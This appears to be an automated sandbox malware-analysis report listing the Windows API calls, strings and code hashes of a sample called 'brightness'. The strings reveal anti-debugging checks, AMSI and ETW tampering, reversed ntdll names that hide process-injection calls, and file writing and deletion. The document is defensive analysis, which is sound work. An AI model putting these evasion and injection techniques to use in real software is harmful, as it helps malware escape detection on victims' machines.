                                                                                                                                            • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                            • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                            • API String ID: 1002360270-4067648912
                                                                                                                                            • Opcode ID: 6eaf25be5fc9e4e68641c5081ce4a8ea637ff8ceec314fba3947fd149347ab0d
                                                                                                                                            • Instruction ID: f62c199a2aae958e3d821f0dbe484a05c2aa7afdc9afbacdd2087b425ad6059a
                                                                                                                                            • Opcode Fuzzy Hash: 6eaf25be5fc9e4e68641c5081ce4a8ea637ff8ceec314fba3947fd149347ab0d
                                                                                                                                            • Instruction Fuzzy Hash: 00F0C8B9E813349EEB15AA79A849F5677DCF786314F08093DBA18871E4D77444108B50

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 10694 27cf024-27cf03e GetModuleHandleW 10695 27cf06a-27cf072 10694->10695 10696 27cf040-27cf052 GetProcAddress 10694->10696 10696->10695 10697 27cf054-27cf064 CheckRemoteDebuggerPresent 10696->10697 10697->10695 10698 27cf066 10697->10698 10698->10695
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(KernelBase), ref: 027CF034
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 027CF046
                                                                                                                                            • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 027CF05D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                            • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                            • API String ID: 35162468-539270669
                                                                                                                                            • Opcode ID: 3c9b50cb78c9717415c62e6460927a5b43dccb0fe132cfa9db8d84303bc48c7a
                                                                                                                                            • Instruction ID: 92ac247b1c4f444597808639bfbb9dfa90e02f5a11dfcabbae4f9fe4651e67e0
                                                                                                                                            • Opcode Fuzzy Hash: 3c9b50cb78c9717415c62e6460927a5b43dccb0fe132cfa9db8d84303bc48c7a
                                                                                                                                            • Instruction Fuzzy Hash: 45F0A770A44248AAD711B6B888897DDFBBA9B15738F7443DEE825625C1E77106C0C652

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027B4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 027B4EDA
                                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CE0B4), ref: 027CE01F
                                                                                                                                            • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,027CE0B4), ref: 027CE04F
                                                                                                                                            • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 027CE064
                                                                                                                                            • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 027CE090
                                                                                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 027CE099
                                                                                                                                              • Part of subcall function 027B4C0C: SysFreeString.OLEAUT32(027CED84), ref: 027B4C1A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1897104825-0
                                                                                                                                            • Opcode ID: 627111ee9a31dd7e4ff2198a41a3451a1f9e1606efabb223dccf9abfac2386cd
                                                                                                                                            • Instruction ID: b2c4220db80f7f3d5581f58fbe603b65fe9ea0e9078a2b6705cc4e11aacde455
                                                                                                                                            • Opcode Fuzzy Hash: 627111ee9a31dd7e4ff2198a41a3451a1f9e1606efabb223dccf9abfac2386cd
                                                                                                                                            • Instruction Fuzzy Hash: BB21C171A40308BAEB12EAE4CC5AFDFB7BDAF08B00F510465B700F71C1D674AA458B55

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 027CE86A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CheckConnectionInternet
                                                                                                                                            • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027B4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 027B4EDA
                                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CDFD2), ref: 027CDF3F
                                                                                                                                            • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027CDF79
                                                                                                                                            • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027CDFA6
                                                                                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027CDFAF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027C7A1F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                            • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027C7A1F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                            • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C82BD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                            • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C7D6C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                            • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 027C8521
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                            • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                            • API String ID: 3503870465-2520021413
                                                                                                                                            • Opcode ID: 12c0696f69957a25fabf646524475235df55db58a5fcf315505e6bd1917e9c96
                                                                                                                                            • Instruction ID: 2c46e37b79007b720777e905a3b0069072874baf8fc24568b51798af90792f21
                                                                                                                                            • Opcode Fuzzy Hash: 12c0696f69957a25fabf646524475235df55db58a5fcf315505e6bd1917e9c96
                                                                                                                                            • Instruction Fuzzy Hash: 45016778640214AFEB03EF74DC65F9EB7EEEF48710F614868B400D7650DA70A9108F21
                                                                                                                                            APIs
                                                                                                                                            • RtlInitUnicodeString.NTDLL(?,?), ref: 027CDEA0
                                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CDEF2), ref: 027CDEB6
                                                                                                                                            • NtDeleteFile.NTDLL(?), ref: 027CDED5
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1459852867-0
                                                                                                                                            • Opcode ID: 2ce24ababce6ca6f7eafc07a418bbf65f452b31757eb2f10f0128c9f2612447b
                                                                                                                                            • Instruction ID: 7d98cfb5893a908f42111436f4ba976749917a8fb20798bc887b1d04bd31a9d0
                                                                                                                                            • Opcode Fuzzy Hash: 2ce24ababce6ca6f7eafc07a418bbf65f452b31757eb2f10f0128c9f2612447b
                                                                                                                                            • Instruction Fuzzy Hash: 4C0167B5A453486EEB16E7B08D95BCDB7BDAF54B00F6000FA9200E6091DA74AB048B21
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027B4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 027B4EDA
                                                                                                                                            • RtlInitUnicodeString.NTDLL(?,?), ref: 027CDEA0
                                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CDEF2), ref: 027CDEB6
                                                                                                                                            • NtDeleteFile.NTDLL(?), ref: 027CDED5
                                                                                                                                              • Part of subcall function 027B4C0C: SysFreeString.OLEAUT32(027CED84), ref: 027B4C1A
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1694942484-0
                                                                                                                                            • Opcode ID: 3a817f9686b4c7db5811e92c7d4fa8b5ca9fd98aaa395154757d53a2dff46c0e
                                                                                                                                            • Instruction ID: 403c081a4e4581e767b927489344e356a5e1c14781bf5d60998faffe1879dd58
                                                                                                                                            • Opcode Fuzzy Hash: 3a817f9686b4c7db5811e92c7d4fa8b5ca9fd98aaa395154757d53a2dff46c0e
                                                                                                                                            • Instruction Fuzzy Hash: E0011CB5940308BAD712EBF0CD55FDEB7FDDB54700F6044B5A601E2581EB74AB048A64
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C6CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,027C6D39,?,?,?,00000000), ref: 027C6D19
                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,027C6E2C,00000000,00000000,027C6DAB,?,00000000,027C6E1B), ref: 027C6D97
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFromInstanceProg
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2151042543-0
                                                                                                                                            • Opcode ID: 60b5186968cd136ee0db88e4193ac70b5d0866fa9dccd702321f039f026af41a
                                                                                                                                            • Instruction ID: b839cb2082419901345c8b8efea76418c09f3280c04fdcad111465aad08485c4
                                                                                                                                            • Opcode Fuzzy Hash: 60b5186968cd136ee0db88e4193ac70b5d0866fa9dccd702321f039f026af41a
                                                                                                                                            • Instruction Fuzzy Hash: 4201F7B12087046EE716DF71DCA696B7FADEB89B10B61087EF501D2640E6309910C860

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C881C: LoadLibraryA.KERNEL32(00000000,00000000,027C8903), ref: 027C8850
                                                                                                                                              • Part of subcall function 027C881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027C8903), ref: 027C8860
                                                                                                                                              • Part of subcall function 027C881C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027C8879
                                                                                                                                              • Part of subcall function 027C881C: FreeLibrary.KERNEL32(74AD0000,00000000,02812388,Function_000065D8,00000004,02812398,02812388,000186A3,00000040,0281239C,74AD0000,00000000,00000000,00000000,00000000,027C8903), ref: 027C88E3
                                                                                                                                            • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029067DC,02906820,OpenSession,0281237C,027DB40C,UacScan,0281237C), ref: 027D826D
                                                                                                                                            • ResumeThread.KERNEL32(00000000,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,UacScan,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C), ref: 027D88B7
                                                                                                                                            • CloseHandle.KERNEL32(00000000,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,UacScan,0281237C,027DB40C,00000000,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C), ref: 027D8A36
                                                                                                                                              • Part of subcall function 027C8798: LoadLibraryW.KERNEL32(bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize,028123A4,027CA774,UacScan), ref: 027C87AC
                                                                                                                                              • Part of subcall function 027C8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027C87C6
                                                                                                                                              • Part of subcall function 027C8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize), ref: 027C8802
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0281237C,027DB40C,UacInitialize,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,UacScan,0281237C), ref: 027D8E28
                                                                                                                                              • Part of subcall function 027B7E10: GetFileAttributesA.KERNEL32(00000000,?,027CFD00,ScanString,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanString,0281237C,027DB40C,UacScan,0281237C,027DB40C,UacInitialize), ref: 027B7E1B
                                                                                                                                              • Part of subcall function 027CDF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CDFD2), ref: 027CDF3F
                                                                                                                                              • Part of subcall function 027CDF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027CDF79
                                                                                                                                              • Part of subcall function 027CDF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027CDFA6
                                                                                                                                              • Part of subcall function 027CDF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027CDFAF
                                                                                                                                              • Part of subcall function 027C8184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,027C820E), ref: 027C81F0
                                                                                                                                            • ExitProcess.KERNEL32(00000000,OpenSession,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,Initialize,0281237C,027DB40C,00000000,00000000,00000000,ScanString,0281237C,027DB40C), ref: 027DAE59
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
                                                                                                                                            • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                            • API String ID: 2481178504-1225450241
                                                                                                                                            • Opcode ID: 8ef6e57ff26d1b22db9b4a2797ef229f812aff735730c7936d8b285c682f4153
                                                                                                                                            • Instruction ID: d50b737b8f9889802133aef8bc90a8d94f944258647a40365826b09e77564bd5
                                                                                                                                            • Opcode Fuzzy Hash: 8ef6e57ff26d1b22db9b4a2797ef229f812aff735730c7936d8b285c682f4153
                                                                                                                                            • Instruction Fuzzy Hash: 7B430F75A101689FDB13EBA4DDA4ADE73F6EF98304F1180E5E009A7656DE30AE81CF11

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000,?,027B2000), ref: 027B17D0
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?,027B2000), ref: 027B17E6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: c76a08a8d3c7cde21d65822eb164e636c9bf4e579673cd882a72baba69157ae0
                                                                                                                                            • Instruction ID: 7af89a056489cf8f53a59ca0993f65da4d6255b753ab2430e9f8bcd31ea0cc21
                                                                                                                                            • Opcode Fuzzy Hash: c76a08a8d3c7cde21d65822eb164e636c9bf4e579673cd882a72baba69157ae0
                                                                                                                                            • Instruction Fuzzy Hash: 6FB11576A002918FCB66CF28E4D4395BBE1FF95320F58C66AD5098B3C9CB70A451CB91

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryW.KERNEL32(amsi), ref: 027C870D
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                              • Part of subcall function 027C7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C7D6C
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027C876C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                            • String ID: DllGetClassObject$W$amsi
                                                                                                                                            • API String ID: 941070894-2671292670
                                                                                                                                            • Opcode ID: 69c2975c11b323c5642dffbac1cbcbf6d787cbec8f1a582f9c751c479b8ae885
                                                                                                                                            • Instruction ID: bff44a2a9b06641b987374f820f7a1ef5090a829c14a72659e7e36aa5e985af6
                                                                                                                                            • Opcode Fuzzy Hash: 69c2975c11b323c5642dffbac1cbcbf6d787cbec8f1a582f9c751c479b8ae885
                                                                                                                                            • Instruction Fuzzy Hash: EAF0445054C382B9E203E6788C49F4BBFCD4B55324F148A5CB2E85A2D2DA75D1148BB7

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,00000000,027B1FE4), ref: 027B1B17
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,027B1FE4), ref: 027B1B31
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
